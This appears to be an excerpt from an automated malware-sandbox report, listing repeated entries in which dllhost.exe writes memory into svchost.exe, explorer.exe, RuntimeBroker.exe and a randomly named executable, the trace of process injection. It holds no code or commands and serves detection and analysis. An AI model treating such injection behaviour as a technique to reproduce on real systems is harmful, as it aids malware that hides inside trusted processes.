Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: DD0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1FF01350000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\ctfmon.exe base: 221D2530000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: BB0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1D400530000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\explorer.exe base: 8850000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: 580000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 27844DD0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 258B00D0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: 12A0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1FA9A260000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: D30000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\dasHost.exe base: 1BFB71A0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 26982020000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: 9E0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 185706E0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: 840000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1496A4A0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\dllhost.exe base: 190043F0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: 410000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 16215D10000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: A40000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\smartscreen.exe base: 159AD5E0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\ApplicationFrameHost.exe base: 221570C0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: E50000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1B8E5260000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 189090B0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: 9A0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 24BB06E0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 28182CD0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: 710000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 1BD9B7A0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: 970000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 238EF1C0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\SysWOW64\wbem\WmiPrvSE.exe base: 2CA0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: 180000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\conhost.exe base: 26CDA140000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: 11A0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: DD0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: D80000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: 580000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: 1070000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: 8F0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: BA0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: F70000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: 9C0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: 420000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: 1A0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: 970000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: 1010000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: EC0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: C00000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: 900000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: 8C0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: 1480000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: 12B0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: 900000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: DC0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: 1010000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: B60000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: D70000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: 1430000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: 6E0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: 970000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: F30000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: 1230000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: 7B0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: 650000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: 7D0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: 1060000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: 870000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: 500000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: 3B0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: F80000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: 500000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: DD0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: E70000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: 970000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: 970000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: 670000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: FF0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: 11D0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: 5A0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: 9A0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: 10E0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: 760000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: D00000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: 6C0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: DD0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: 980000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: 1100000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: 620000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: 1A0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: DD0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: 1C0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: BB0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: D90000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: 580000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: 12A0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: B80000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: D30000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: 1380000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: 9E0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: 840000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: 8D0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: 410000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: FA0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: A40000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: E50000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: 570000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: 9A0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: 710000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: 8E0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: 970000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: E30000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: 180000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: 11A0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: FC0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: 7F0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: 8F0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: F70000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: 640000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: 420000
